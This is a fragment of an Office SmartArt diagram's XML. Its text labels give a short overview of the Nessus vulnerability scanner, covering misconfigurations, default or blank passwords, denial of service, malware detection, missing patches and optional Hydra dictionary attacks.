    <dgm:cxn modelId="{A25824BE-2465-443D-A5A8-E19894F9C61A}" type="presParOf" srcId="{2348F657-352C-40BF-8469-9DFD9096DE3D}" destId="{E0CA4177-66DF-4F25-9439-071F7C05842A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{3D82C0B6-5920-4EC5-88C4-FBD4AADA7F94}" type="presParOf" srcId="{EFF6511E-694B-433D-A816-8879F86D994E}" destId="{96A008A9-2152-4F43-BA5E-F6DD4196DED3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{018BA2E2-4878-4BFF-873A-ACFABCBC0540}" type="presParOf" srcId="{EFF6511E-694B-433D-A816-8879F86D994E}" destId="{BB8BC46F-B3BB-4B38-9F94-11B0760D348F}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{04CD3009-9775-4BA3-8578-F207D9633602}" type="presParOf" srcId="{BB8BC46F-B3BB-4B38-9F94-11B0760D348F}" destId="{AAB2854E-1573-4813-B44B-0E40ABF9F3A9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{1609E568-54B7-4F53-A440-BA60198D4128}" type="presParOf" srcId="{BB8BC46F-B3BB-4B38-9F94-11B0760D348F}" destId="{60D8E25D-7C97-4061-8BA5-6AC64E568E6E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{93A061CC-0A24-4BD5-898E-F5226CF46CDF}" type="presParOf" srcId="{EFF6511E-694B-433D-A816-8879F86D994E}" destId="{53B1D6E7-1EA9-40AA-AE6D-B6BBC8522E0F}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{B76924C1-E189-48E4-9982-AD4586D89E6C}" type="presParOf" srcId="{EFF6511E-694B-433D-A816-8879F86D994E}" destId="{C3612477-A058-45CB-9C69-39B49D4C610E}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{73C91169-6C0D-4298-AD20-889A82554441}" type="presParOf" srcId="{C3612477-A058-45CB-9C69-39B49D4C610E}" destId="{9D065394-3675-40F7-8AF3-277051A66EC8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{108BD8AA-35B5-46EC-A7B3-982C8A37930A}" type="presParOf" srcId="{C3612477-A058-45CB-9C69-39B49D4C610E}" destId="{F59DF48C-62BC-4479-890C-9D4C209EAAD8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{F9AF3055-C16A-43DE-8E55-579B16A67046}" type="presParOf" srcId="{EFF6511E-694B-433D-A816-8879F86D994E}" destId="{8D2B3185-F384-4D3D-A45A-4EABB10A17D4}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{5DC24A1B-430C-4C0C-9B45-4EBA27D83075}" type="presParOf" srcId="{EFF6511E-694B-433D-A816-8879F86D994E}" destId="{16506F0E-16BC-498C-BD6C-39907F680932}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{F7D3A221-EE8B-4C55-AB14-F9307C67DAE7}" type="presParOf" srcId="{16506F0E-16BC-498C-BD6C-39907F680932}" destId="{79163A5B-2D1F-4A36-98F4-68121B6E313C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{EAD6EC53-5EF3-4EB6-89A4-999A77E9D2D6}" type="presParOf" srcId="{16506F0E-16BC-498C-BD6C-39907F680932}" destId="{E93C5ABA-D66A-4A38-8A57-C8B7B978EE6E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{1C0685D8-D457-432E-BD60-BE73C4FFE62A}" type="presParOf" srcId="{EFF6511E-694B-433D-A816-8879F86D994E}" destId="{72C9877A-FDD9-4192-8817-50ACCF573590}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{BA970183-F3D0-42C0-9C14-48F57DE08E8F}" type="presParOf" srcId="{EFF6511E-694B-433D-A816-8879F86D994E}" destId="{645D9658-A613-4259-BB0E-F8BB4D23E512}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{7F522504-8A5A-4C9C-BE2F-0A039E43F28F}" type="presParOf" srcId="{645D9658-A613-4259-BB0E-F8BB4D23E512}" destId="{E2EF1D64-4C1C-4AD7-93A8-812483A023F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{C9B7B959-62CD-43F7-9CAC-B10ACD45643D}" type="presParOf" srcId="{645D9658-A613-4259-BB0E-F8BB4D23E512}" destId="{F3B993C7-17ED-48EE-94CE-61EA2E177E4C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{64FF6D04-BFF2-4B3F-A22E-EBD6A2A5BCEC}" type="presParOf" srcId="{EFF6511E-694B-433D-A816-8879F86D994E}" destId="{B6B1FCD9-8491-4CAE-BB83-AC6D7619275D}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{385B080B-4B59-4E6C-A185-51F86D6262AC}" type="presParOf" srcId="{EFF6511E-694B-433D-A816-8879F86D994E}" destId="{7C22F00F-B970-421A-9A81-E08B05E2C6E8}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{CFA2FFFC-A134-4E19-8A14-CF937A5FCD17}" type="presParOf" srcId="{7C22F00F-B970-421A-9A81-E08B05E2C6E8}" destId="{6B3DB5FC-164F-4AF8-8749-AF2A5A69A97A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{A204BFA3-97B9-4851-911A-A257D89D86E7}" type="presParOf" srcId="{7C22F00F-B970-421A-9A81-E08B05E2C6E8}" destId="{AA207F68-DE03-4048-AABE-56DCACE31951}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{9CBF41BB-98F0-476C-9418-CEF5A2234C94}" type="presParOf" srcId="{EFF6511E-694B-433D-A816-8879F86D994E}" destId="{06B807D4-A5A1-4608-B141-788390518BF2}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{B51EA701-38F3-433B-AAC3-66CADA77E135}" type="presParOf" srcId="{EFF6511E-694B-433D-A816-8879F86D994E}" destId="{6645FE1C-373C-46A0-BA2C-33403FAD30BE}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{14A2CBFA-66A2-49C5-8AD6-3E9149A28EED}" type="presParOf" srcId="{6645FE1C-373C-46A0-BA2C-33403FAD30BE}" destId="{B200311A-4AB1-4064-9DA1-226B343253D4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{ABF775B8-031C-4167-A85A-D8F5F95D8D07}" type="presParOf" srcId="{6645FE1C-373C-46A0-BA2C-33403FAD30BE}" destId="{F62EB9D0-0CF9-4EEE-BB4E-1F834AF4539F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{9F0535CC-1B91-4518-BA50-165E81A36834}" type="presParOf" srcId="{EFF6511E-694B-433D-A816-8879F86D994E}" destId="{AF9E695A-BCB4-4FFE-94E0-4FACD8AA92D7}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{834F0E71-AF17-47AC-B52B-82971DF836F0}" type="presParOf" srcId="{EFF6511E-694B-433D-A816-8879F86D994E}" destId="{3D6054B9-3CA6-4840-9A9B-495F0CDD8F43}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{745B0D6D-9B06-4D70-883E-C1E8C2DEE6B0}" type="presParOf" srcId="{3D6054B9-3CA6-4840-9A9B-495F0CDD8F43}" destId="{C5549DC4-42CD-437A-B7F0-DD4DC58630DC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{35B116D5-395B-4FA6-B4DF-3F91E956365B}" type="presParOf" srcId="{3D6054B9-3CA6-4840-9A9B-495F0CDD8F43}" destId="{BD6B7ACD-EF1D-4727-829C-8CA8B8CDACA8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{1362E4C9-F601-4A06-9A93-A09CCA246B45}" type="presParOf" srcId="{EFF6511E-694B-433D-A816-8879F86D994E}" destId="{99F180B1-9437-4069-81E1-8757BD1AECD9}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{A88AC295-3990-42FF-BD8B-A7D1E0B44B9A}" type="presParOf" srcId="{EFF6511E-694B-433D-A816-8879F86D994E}" destId="{BA1F991C-F4A8-4739-9BA4-08EC02624E8F}" srcOrd="16" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{540E347D-18E2-4A25-893E-BCCA96E43255}" type="presParOf" srcId="{BA1F991C-F4A8-4739-9BA4-08EC02624E8F}" destId="{5333FC7D-AC1D-4415-B295-06298BCF2AB9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess4"/>
    <dgm:cxn modelId="{7B2427C4-E2AD-4F62-BAD0-217EE88C2804}" type="presParOf" srcId="{BA1F991C-F4A8-4739-9BA4-08EC02624E8F}" destId="{1D3AB934-F3C8-492E-9ED5-B3B5B4279D38}"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B455D4-ADD8-4222-B11B-A1C393A6532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BCCAC2D1-DBE2-4D68-8802-F3A4DA191B45}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Nessus scan vulnerabilities</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EE45A422-E278-4CBF-B178-5F35C2431681}" type="parTrans" cxnId="{FA788D62-62C0-4A73-80AA-0AC525875978}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DDB03FCF-882D-4273-BFE4-BF4D9A0BBF69}" type="sibTrans" cxnId="{FA788D62-62C0-4A73-80AA-0AC525875978}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BACE6BAC-B40C-48F5-9FF2-89F3F43A2829}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>That allow a remote hacker to control</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07645953-6746-40E3-95FD-B93973D966AD}" type="parTrans" cxnId="{7345ED83-C14C-4A70-8383-C91A27366012}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN" sz="2400">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{265CD91F-AA8B-48CA-B9D4-F3AF4156E16C}" type="sibTrans" cxnId="{7345ED83-C14C-4A70-8383-C91A27366012}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D43D5D87-577C-4378-866C-A911F411588F}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Misconfiguration</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FAF121E9-4743-4EF9-85AC-390B66255477}" type="parTrans" cxnId="{AB91AA8B-46C2-4023-A955-96D78FDFBB30}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN" sz="2400">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C31A70E2-6131-4517-8F3F-81B4A949945A}" type="sibTrans" cxnId="{AB91AA8B-46C2-4023-A955-96D78FDFBB30}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7218D4DA-6197-47DE-A1D7-65DB678CB11E}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Default passwords, </a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8C3D0C97-92D4-4824-B529-08A3B0E36878}" type="parTrans" cxnId="{C6A02C5C-195E-4B64-A90F-D0C5AB426714}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN" sz="2400">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5B3B3A7B-6E09-4BCF-9BE9-5B99A534987A}" type="sibTrans" cxnId="{C6A02C5C-195E-4B64-A90F-D0C5AB426714}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CCE16824-81C2-4DCD-8C27-7029FD1E527D}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Denials of service</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB2F8AAD-9D27-449B-B23F-DC4F8C98A604}" type="parTrans" cxnId="{786B8F97-CA4D-4C40-A1EB-C08355CCA498}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN" sz="2400">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1CC8306-AE73-49D9-B8F0-B8756F9BAC47}" type="sibTrans" cxnId="{786B8F97-CA4D-4C40-A1EB-C08355CCA498}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0C3B31DA-A43A-4703-9EBE-7552B3EB741D}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Finding malware</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2038D4B3-FD3F-4BBB-8F51-308C33500ADE}" type="parTrans" cxnId="{2691D9C6-A0C0-4547-AD83-B5AB078FB012}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN" sz="2400">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3A1AAC6A-D472-4367-BE77-C2DAA76E95F9}" type="sibTrans" cxnId="{2691D9C6-A0C0-4547-AD83-B5AB078FB012}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF26DB8F-6634-49C4-A18C-B474794869D1}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1000" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Agentless </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>auditing</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9FC183D4-6AE7-4ECC-BD48-ACFAE36F1CB1}" type="parTrans" cxnId="{74D68E79-84DA-418F-BA87-6AAE1E0C3AA8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN" sz="2400">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A6FE5BA4-B09E-45A0-9E83-470EC456A092}" type="sibTrans" cxnId="{74D68E79-84DA-418F-BA87-6AAE1E0C3AA8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF5D2ABF-0C44-41BE-A90C-7C0D453A8C3A}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Common passwords,</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:rPr>
            <a:t> and blank/absent passwords</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72D5FDBC-312E-4A41-9604-23E35F1DE216}" type="parTrans" cxnId="{4E2A85F5-664C-4A1B-B4B5-D4B71B15CE06}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN" sz="2400">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0C0AB6D4-17FD-47A6-8EE6-B5AE514F5EA9}" type="sibTrans" cxnId="{4E2A85F5-664C-4A1B-B4B5-D4B71B15CE06}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{19E5285C-4C1F-46B5-A9D7-49DFFE8F5F9C}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1000" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>To make sure no host on your network is missing security patches</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7775A7A4-4A9D-453E-9FB9-71221EC91F4F}" type="parTrans" cxnId="{8B47B887-4259-4672-A5E8-EE86F7222D15}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN" sz="2400">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69E7577D-9346-4816-BE9E-D681FCD613F7}" type="sibTrans" cxnId="{8B47B887-4259-4672-A5E8-EE86F7222D15}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7342ED7B-6627-47DF-AE8D-62630F2EE56D}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Nessus can also call Hydra (an external tool) to launch a dictionary attack.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F6C77E83-5F2C-48B5-A383-B8390645BA55}" type="parTrans" cxnId="{F1B89C29-7274-4431-9561-B12179CD320B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN" sz="2400">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E07C5EF-6FF5-4B80-B4A7-7487FBDAAD6B}" type="sibTrans" cxnId="{F1B89C29-7274-4431-9561-B12179CD320B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20521B43-75FE-4917-ADC7-96207A74F416}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(missing patches, etc.).</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{62F1AE4C-DE61-4D7F-A15C-89EF95EDA984}" type="parTrans" cxnId="{89838814-DD5A-467A-80A2-B85AD5B7A3B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN" sz="2400">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4E555350-4A2A-4465-A188-A72EEB5E534C}" type="sibTrans" cxnId="{89838814-DD5A-467A-80A2-B85AD5B7A3B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{90329390-FD35-477C-900A-515C66219535}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>or </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>access sensitive data on a system.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1000" dirty="0">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{63B85593-3FA6-4A96-81F1-A8DC66A6FF21}" type="parTrans" cxnId="{7D1A84E3-E2CC-4D1B-9B81-156483B85C5C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN" sz="2400">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
